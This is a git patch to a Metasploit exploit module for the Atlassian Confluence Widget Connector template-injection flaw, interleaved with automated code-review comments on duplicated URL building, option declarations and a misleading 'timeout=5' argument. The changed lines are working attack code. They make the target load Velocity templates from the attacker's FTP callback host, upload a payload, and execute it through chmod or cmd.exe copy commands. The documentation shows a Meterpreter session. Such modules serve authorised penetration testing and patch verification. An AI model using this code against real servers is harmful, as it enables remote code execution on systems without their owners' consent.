From cf140f084076ffe22ff4d54e1ca8a1555c74ef76 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Tue, 25 Jun 2019 12:43:04 -0500
Subject: [PATCH] Make SRVHOST the callback address
---
 .../multi/http/confluence_widget_connector.md | 6 ++---
 .../multi/http/confluence_widget_connector.rb | 23 ++++++++++---------
 2 files changed, 14 insertions(+), 15 deletions(-)
diff --git a/documentation/modules/exploit/multi/http/confluence_widget_connector.md b/documentation/modules/exploit/multi/http/confluence_widget_connector.md
index 7949f7d93c..7e427598de 100644
--- a/documentation/modules/exploit/multi/http/confluence_widget_connector.md
@@ -15,8 +15,6 @@ Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before
 # Verification Steps
-List the steps needed to make sure this thing works
-
 - [ ] Setting up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
 - [ ] Start `msfconsole`
 - [ ] `use exploit/multi/http/confluence_widget_connector`
@@ -30,7 +28,7 @@ List the steps needed to make sure this thing works
 # Options
 - **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
-- **TRIGGERURL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=dQw4w9WgXcQ" is the default)
+- **TRIGGERURL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=kxopViU98Xo" is the default)
 # Scenario
 ## Tested on Confluence 6.8.2 with Windows target
@@ -160,4 +158,4 @@ meterpreter > quit
 [*] target.com - Meterpreter session 1 closed. Reason: User exit
 msf5 exploit(multi/http/confluence_widget_connector) >
-```
\ No newline at end of file
+```
diff --git a/modules/exploits/multi/http/confluence_widget_connector.rb b/modules/exploits/multi/http/confluence_widget_connector.rb
index 6fc081b67f..a3bc1dd604 100644
--- a/modules/exploits/multi/http/confluence_widget_connector.rb
+++ b/modules/exploits/multi/http/confluence_widget_connector.rb
@@ -60,9 +60,10 @@ class MetasploitModule < Msf::Exploit::Remote
 register_options(
 [
+ OptAddress.new('SRVHOST', [true, 'Callback address for template loading']),
 OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
 OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',
- 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])
+ 'https://www.youtube.com/watch?v=kxopViU98Xo'])
 ])
 end
@@ -182,7 +183,7 @@ class MetasploitModule < Msf::Exploit::Remote
 start_service
 @check_text = Rex::Text.rand_text_alpha(5..10)
- res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm")
+ res = inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}check.vm")
 if res && res.body && res.body.include?(@check_text)
 checkcode = Exploit::CheckCode::Vulnerable
 end
@@ -247,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Remote
 # @return [String]
 def get_java_property(prop)
 @prop = prop
- res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm")
+ res = inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm")
 if res && res.body
 return clear_response(res.body)
 end
@@ -304,7 +305,7 @@ class MetasploitModule < Msf::Exploit::Remote
 @command = "cmd.exe /C copy #{fname} #{new_fname}"
 end
- inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+ inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
 end
 # Returns the normalized file path for payload.
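Review bot: The new `OptAddress.new('SRVHOST', ...)` entry in `register_options` (hunk `@@ -60,9 +60,10 @@`) carries no comment explaining why an option the module evidently already had is declared again. The Options section of the module's documentation file, edited in this same commit, still lists only TARGETURI and TRIGGERURL. The old lines already read `datastore['SRVHOST']`, so the option presumably came from a server mixin whose default is not usable as a callback address; that reasoning belongs next to the declaration, for example `# Redeclared as required with no default: this value is embedded in the ftp:// template URL, so it must be a concrete address.` A matching `- **SRVHOST**: ...` line in the documentation would tell users the option is now mandatory. The method containing `register_options` begins before the hunk.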
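Review bot: The FTP template URL is built by hand in the `check` hunk (`@@ -182,7 +183,7 @@`) and again in `@@ -247,7`, `@@ -304,7`, `@@ -354,10`, `@@ -379,14` and `@@ -406,17`, ten copies in all that differ only in the template name. This commit had to touch every copy, which is the maintenance cost of the duplication. A private helper `def template_url(name)` returning `"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}#{name}.vm"` would leave a single place to change. `srvhost` and `srvport` are not defined in any visible hunk, so this assumes they come from the server mixin and return the same datastore values the old code read. The enclosing methods start or end outside these hunks.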
@@ -354,10 +355,10 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 print_status("Attempting to upload #{@fname}")
- inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+ inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
 print_status("Attempting to execute #{@fname}")
- inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+ inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
 end
@@ -379,14 +380,14 @@ class MetasploitModule < Msf::Exploit::Remote
 register_files_for_cleanup(@fname, new_fname)
 print_status("Attempting to upload #{@fname}")
- inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+ inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
 print_status("Attempting to copy payload to #{new_fname}")
 get_dup_file_code(@fname, new_fname)
 print_status("Attempting to execute #{new_fname}")
 @command = new_fname
- inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+ inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
 end
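Review bot: `timeout=5` in the rewritten `inject_template(..., timeout=5)` call (last changed line of `@@ -354,10 +355,10 @@`, and likewise in `@@ -379,14` and `@@ -406,17`) is not a keyword argument. Ruby evaluates it as an assignment to a new local `timeout` and passes 5 positionally. The commit carries this over unchanged from the old lines, and it only does what it appears to do while the timeout remains the second positional parameter of `inject_template`, whose definition is outside the diff. Passing a plain `5` as the second argument, or `timeout: 5` if the method is changed to accept a keyword, would state the intent and drop the stray local.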
@@ -406,17 +407,17 @@ class MetasploitModule < Msf::Exploit::Remote
 register_files_for_cleanup(@fname, new_fname)
 print_status("Attempting to upload #{@fname}")
- inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+ inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
 @command = "chmod +x #{@fname}"
- inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+ inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
 print_status("Attempting to copy payload to #{new_fname}")
 get_dup_file_code(@fname, new_fname)
 print_status("Attempting to execute #{new_fname}")
 @command = new_fname
- inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+ inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
 end
 def exploit